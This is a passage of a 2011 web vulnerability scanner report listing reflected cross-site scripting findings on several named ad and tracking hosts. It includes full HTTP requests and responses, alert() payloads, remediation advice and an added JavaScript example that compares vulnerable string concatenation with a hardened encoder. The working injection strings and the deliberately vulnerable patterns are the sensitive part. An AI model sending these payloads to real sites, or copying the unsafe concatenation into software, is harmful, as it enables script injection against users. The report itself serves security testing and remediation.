Cookie: fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827; fscookies=b64_VcxBDsIwDATA3.QGSozt2Ie8BQWIVA4NiIb-E6Vqa3xbzXrB..AZhPFCKYByRAikLt9aWRoYvX5yfdTvnBjPvYHkt2NxvUin6dmWFBxj3-kPr3epe5hzu09loEY9miNsTRWzMcIuke0PW0EraIWskJVoJR4iYtZGWOUH
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:12:10 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 10152
var wv_available = true; if (typeof(wv_available_vars) == 'undefined') wv_available_vars = new Array(); wv_available_vars['655713d35cb';alert(1)//c971cafb721'] = true;
var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac ...[SNIP]...
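The following JavaScript is an added example and not code from any of the applications in this report. It reproduces the two string-concatenation patterns seen above (the rm_url assignment in finding 1.64 and the wv_available_vars['...'] assignment in the response immediately above), puts a hardened encoder beside them, and evaluates each generated script with alert() stubbed so that it is visible whether the injected code parses and runs. Host and variable names are illustrative; the two payloads are the ones the findings used.

```javascript
// Added example (not code from the report or the scanned applications):
// vulnerable and hardened emission of request data into JavaScript string
// literals, plus a harness that evaluates the result as a browser would.

// Vulnerable pattern: raw request text spliced into a double-quoted JS
// string literal, as in the rm_url assignment in finding 1.64.
function renderUnsafe(rawQuery) {
  return 'var rm_url="http://ads.example.invalid/imp?Z=0x0&' + rawQuery +
         '&s=1421534";';
}

// Vulnerable pattern: raw request text spliced into a single-quoted string
// used as a property name, as in the wv_available_vars assignment above.
function renderIndexUnsafe(template) {
  return "var wv_available_vars = {};\n" +
         "wv_available_vars['" + template + "'] = true;\n" +
         "var next_statement = 1;";
}

// Encode a value for a JavaScript string literal.  JSON.stringify escapes
// the double quote, backslash and control characters; the extra pass turns
// <, >, &, / and the U+2028/U+2029 line terminators into \uXXXX escapes so
// the literal is also safe inside an inline <script> block.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\/\u2028\u2029]/g, function (ch) {
    return '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

function renderSafe(rawQuery) {
  return 'var rm_url=' +
         jsStringLiteral('http://ads.example.invalid/imp?Z=0x0&' + rawQuery + '&s=1421534') +
         ';';
}

function renderIndexSafe(template) {
  return "var wv_available_vars = {};\n" +
         "wv_available_vars[" + jsStringLiteral(template) + "] = true;\n" +
         "var next_statement = 1;";
}

// Evaluate a generated script with alert() stubbed and report whether it
// parsed, whether alert() was reached (i.e. injected code ran) and the value
// of resultExpr afterwards.  A script that fails to parse is what a browser
// would silently discard.
function runScript(source, resultExpr) {
  var alerts = [];
  var fn;
  try {
    fn = new Function('alert', source + '\nreturn (' + resultExpr + ');');
  } catch (e) {
    return { parsed: false, error: e.name, alerts: alerts, value: undefined };
  }
  try {
    var value = fn(function (x) { alerts.push(x); });
    return { parsed: true, error: null, alerts: alerts, value: value };
  } catch (e) {
    return { parsed: true, error: e.name, alerts: alerts, value: undefined };
  }
}

// Payloads taken from the findings above.
var QUOTE_PAYLOAD = 'fa4b7"-alert(1)-"af13f1e484=1';
var COMMENT_PAYLOAD = "655713d35cb';alert(1)//c971cafb721";

function demoScriptContext() {
  return {
    unsafe: runScript(renderUnsafe(QUOTE_PAYLOAD), 'rm_url'),
    safe: runScript(renderSafe(QUOTE_PAYLOAD), 'rm_url'),
    indexUnsafe: runScript(renderIndexUnsafe(COMMENT_PAYLOAD), 'Object.keys(wv_available_vars)[0]'),
    indexSafe: runScript(renderIndexSafe(COMMENT_PAYLOAD), 'Object.keys(wv_available_vars)[0]')
  };
}
```

Run with node. The unsafe render reports alert(1) being called and rm_url ending up as NaN, which is the "-alert(1)-" technique: the string is closed, the call becomes an operand of a subtraction and the string is reopened, so the statement stays valid. The ';alert(1)//' payload inside the index expression leaves the bracket unterminated and is reported as a SyntaxError, which is why that form only works where the rest of the line can be discarded. Both hardened renders return the original value and never reach alert().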
The value of the urid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46c6"%3balert(1)//6377ce7bc77 was submitted in the urid parameter. This input was echoed as b46c6";alert(1)//6377ce7bc77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted inside a JavaScript string literal, it should be escaped for that context before output (the backslash, both quote characters, line terminators and, for script embedded in an HTML page, the < and / characters), for example as \xHH or \uHHHH sequences; HTML entity encoding on its own does not protect a script context.
Request
GET /as/commonlink.php?accountid=200106286435&template=253566&urid=69799b46c6"%3balert(1)//6377ce7bc77&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1
Host: as00.estara.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: fscookies=b64_lY9BDoMgEEVPgzsbGGAGFm666DUatSSaKjaK9y.xVafLEjYv7-8fACmVRHBotK0UeCQDIF1RNyksCZi9z3V8xHWs0FyU9cbK-aArctCWXZ.WShdo8s4vTK8QDxjr1HZhk578mdxgT3rHNjY4DCHvIDeGG8ON5cZyQ9zQaZxjaxt8zdDHZ4nWktIVfJ7dGGxRAAh9rYcwJwFOCfACbvmiJmoDNS3R8Xf1Z69ZU5pi7r0B; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com
Connection: close
Content-Type: application/x-javascript
Content-Length: 34262
The value of the urid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62faa'%3balert(1)//57357bc1d12 was submitted in the urid parameter. This input was echoed as 62faa';alert(1)//57357bc1d12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that in the response below the reflection sits inside the string literal passed to setTimeout(): the injected ' terminates that literal and the following // comments out the rest of the line, including the remaining arguments and the closing parenthesis of the setTimeout call, so the script as shown will fail to parse rather than execute. Confirm execution in a browser before rating the finding as exploitable.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted inside a JavaScript string literal, it should be escaped for that context before output (the backslash, both quote characters, line terminators and, for script embedded in an HTML page, the < and / characters), for example as \xHH or \uHHHH sequences; HTML entity encoding on its own does not protect a script context.
Request
GET /as/commonlink.php?accountid=200106286435&template=253566&urid=6979962faa'%3balert(1)//57357bc1d12&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1
Host: as00.estara.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: fscookies=b64_lY9BDsIgEEVPQ3caGJgZWLBx4TUMVYyNLTUV729TtY5LCZuX9-8PgNZGE3hyFqOBQOwAtG9SW-O9grCHKZVTeQyR3NZgcKg-h3wzB3Fz6eo92obcvPML4y2XFYZUj5e8yMDhm1zgkwxebCywGibZIWmcNE4alAalYWn4a7wXawu8Td.V64YQ2dgIr2cTnFNSwMruUp.nqsAbBUHBfr7IFrk9mpOB9e-mz177qHUsc.8J; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com
Connection: close
Content-Type: application/x-javascript
Content-Length: 34262
var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_accountid"]=" ...[SNIP]... =500;wv_vars["ui_height"]=500;wv_start(wv_argscopy);wv_vars["ui_width"]=prev_ui_width;wv_vars["ui_height"]=prev_ui_height;}setTimeout('eStaraCookieDictionaryDelete(\'estaracookie\', \'rule_action_6979962faa';alert(1)//57357bc1d12\', true, null);', 1000);var wv_available = true; if (typeof(wv_available_vars) == 'undefined') wv_available_vars = new Array(); wv_available_vars['253566'] = true; if (typeof(wv_vars)=="undefined") ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f8470<script>alert(1)</script>d3eebd4205c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response is served with Content-Type: application/x-javascript. A script tag inside a JavaScript file is not interpreted by a browser that loads the file through a script element, so the injected markup runs only if the response is rendered as an HTML document; whether that happens depends on how the endpoint is reached and on whether the browser honours the declared type, and it should be confirmed in the target browser before the finding is rated. The same applies to the other beacon.js parameters reported below.
Request
GET /beacon.js?c1=2f8470<script>alert(1)</script>d3eebd4205c&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:20 GMT
Date: Thu, 03 Feb 2011 16:08:20 GMT
Connection: close
Content-Length: 3587
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 961a2<script>alert(1)</script>f667e8d66a2 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=9319&c5=&c6=&c10=3209360961a2<script>alert(1)</script>f667e8d66a2&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 18:53:46 GMT
Date: Thu, 03 Feb 2011 18:53:46 GMT
Connection: close
Content-Length: 3593
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 78a58<script>alert(1)</script>157d4440e69 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=&c15=78a58<script>alert(1)</script>157d4440e69 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:24 GMT
Date: Thu, 03 Feb 2011 16:08:24 GMT
Connection: close
Content-Length: 3587
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 45f85<script>alert(1)</script>5d73e5872e0 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=603578645f85<script>alert(1)</script>5d73e5872e0&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:20 GMT
Date: Thu, 03 Feb 2011 16:08:20 GMT
Connection: close
Content-Length: 3587
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c039a<script>alert(1)</script>445d1c22264 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786c039a<script>alert(1)</script>445d1c22264&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:21 GMT
Date: Thu, 03 Feb 2011 16:08:21 GMT
Connection: close
Content-Length: 3587
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 257a9<script>alert(1)</script>4757a91e5f0 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=257a9<script>alert(1)</script>4757a91e5f0&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:22 GMT
Date: Thu, 03 Feb 2011 16:08:22 GMT
Connection: close
Content-Length: 3587
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1f462<script>alert(1)</script>398a6a54a7c was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=1f462<script>alert(1)</script>398a6a54a7c&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:22 GMT
Date: Thu, 03 Feb 2011 16:08:22 GMT
Connection: close
Content-Length: 3587
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6daaf<script>alert(1)</script>1ad5ede9ace was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=6daaf<script>alert(1)</script>1ad5ede9ace&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:23 GMT
Date: Thu, 03 Feb 2011 16:08:23 GMT
Connection: close
Content-Length: 3587
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71024'%3balert(1)//daafc6b74fc was submitted in the admeld_adprovider_id parameter. This input was echoed as 71024';alert(1)//daafc6b74fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted inside a JavaScript string literal, it should be escaped for that context before output (the backslash, both quote characters, line terminators and, for script embedded in an HTML page, the < and / characters), for example as \xHH or \uHHHH sequences; HTML entity encoding on its own does not protect a script context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=871024'%3balert(1)//daafc6b74fc&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:17 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 190
Date: Thu, 03 Feb 2011 18:54:17 GMT
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ad9f'%3balert(1)//03ee31b5e06 was submitted in the admeld_callback parameter. This input was echoed as 9ad9f';alert(1)//03ee31b5e06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted inside a JavaScript string literal, it should be escaped for that context before output (the backslash, both quote characters, line terminators and, for script embedded in an HTML page, the < and / characters), for example as \xHH or \uHHHH sequences; HTML entity encoding on its own does not protect a script context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9ad9f'%3balert(1)//03ee31b5e06 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:28 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 190
Date: Thu, 03 Feb 2011 18:54:27 GMT
1.79. http://business-news.thestreet.com/ocregister [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://business-news.thestreet.com
Path:
/ocregister
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b12"><script>alert(1)</script>c8944471237 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ocregister?b9b12"><script>alert(1)</script>c8944471237=1 HTTP/1.1
Host: business-news.thestreet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=0
Last-Modified: Thu, 03 Feb 2011 19:04:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie, Accept-Encoding
ETag: "1296759876"
Content-Type: text/html; charset=utf-8
Content-Length: 65305
X-Served-By: pmisccache01.dc.thestreet.com
Date: Thu, 03 Feb 2011 19:04:38 GMT
X-Varnish: 209384145
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- Date Created: 20110203 14:04:38 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <a href="/ocregister?b9b12"><script>alert(1)</script>c8944471237=1/story/10-terrible-financial-choices-in-music-history/10993786"> ...[SNIP]...
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 693e2"%3balert(1)//dacff80c547 was submitted in the $ parameter. This input was echoed as 693e2";alert(1)//dacff80c547 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. In the response below the double-quote payload has no effect on the single-quoted zzPat literal, but it does terminate the double-quoted zzStr literal; the // then comments out the rest of that line, including the } that closes the enclosing if block, so whether the script still parses depends on the lines that follow and should be confirmed in a browser before the finding is rated. The response also stores the submitted value in the FFpb cookie, so it may be re-emitted on later requests; that persistence is worth checking.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted inside a JavaScript string literal, it should be escaped for that context before output (the backslash, both quote characters, line terminators and, for script embedded in an HTML page, the < and / characters), for example as \xHH or \uHHHH sequences; HTML entity encoding on its own does not protect a script context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=693e2"%3balert(1)//dacff80c547&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
